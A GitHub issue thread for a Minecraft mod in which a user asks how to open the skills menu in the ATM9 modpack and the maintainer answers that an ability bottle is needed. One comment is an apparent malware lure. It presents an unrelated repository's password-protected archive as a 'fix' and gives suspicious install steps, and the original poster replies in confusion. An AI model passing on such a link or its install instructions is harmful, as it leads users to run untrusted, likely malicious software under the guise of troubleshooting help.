### ISSUE TITLE
Question about mod

### ISSUE THREAD

**Issue by Soulivan71** [CyclopsMC/EverlastingAbilities#266]
#### Issue type:

- :question: Question 
____

#### Question:
Im playing ATM9 mod pack and can't see a keybind to open the skills menu there is n option to add it or idk??

**Comment by rubensworks** [comment]
Someone will answer your question soon. In the meantime, you might be able to get help more quickly on our [Discord server](https://discord.gg/9yDxubB).

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Soulivan71** [comment]
> to fix your trouble check this fix, i see it in another issue, https://github.com/Jostino/RimWorld-it/releases/tag/fix password: changeme when you installing, you need to place a check in install to path and select "gcc."
> 
> > <img alt="" width="48" src="https://camo.githubusercontent.com/91eae2cfd2755ee905912285fc215c5338deb5386e3017eef5434a828329df96/68747470733a2f2f6f70656e67726170682e6769746875626173736574732e636f6d2f313963636230316163356636393037646366653362653763623633613661626533393932653939396437633561653264396532636166396263363139613931312f4a6f7374696e6f2f52696d576f726c642d69742f72656c65617365732f7461672f666978"><img alt="" height="14" src="https://camo.githubusercontent.com/c7475aac04b72ccdbdab6d5f8abf505c824fdb625ef049acf2c773106c631bff/68747470733a2f2f6769746875622e6769746875626173736574732e636f6d2f66617669636f6e732f66617669636f6e2e737667"> GitHub**[Release x86_64-win64-ranlib · Jostino/RimWorld-it](/Jostino/RimWorld-it/releases/tag/fix)**passwrod from archive - changeme

The fck is this

**Comment by Soulivan71** [comment]
Im using the 1.20.1 / atm9sky-1.1.1

**Comment by Soulivan71** [comment]
Ok we need an ability botle, but can be cool to add a keybind aswell

**Comment by rubensworks** [comment]
Indeed, you need to right-click with an ability bottle.
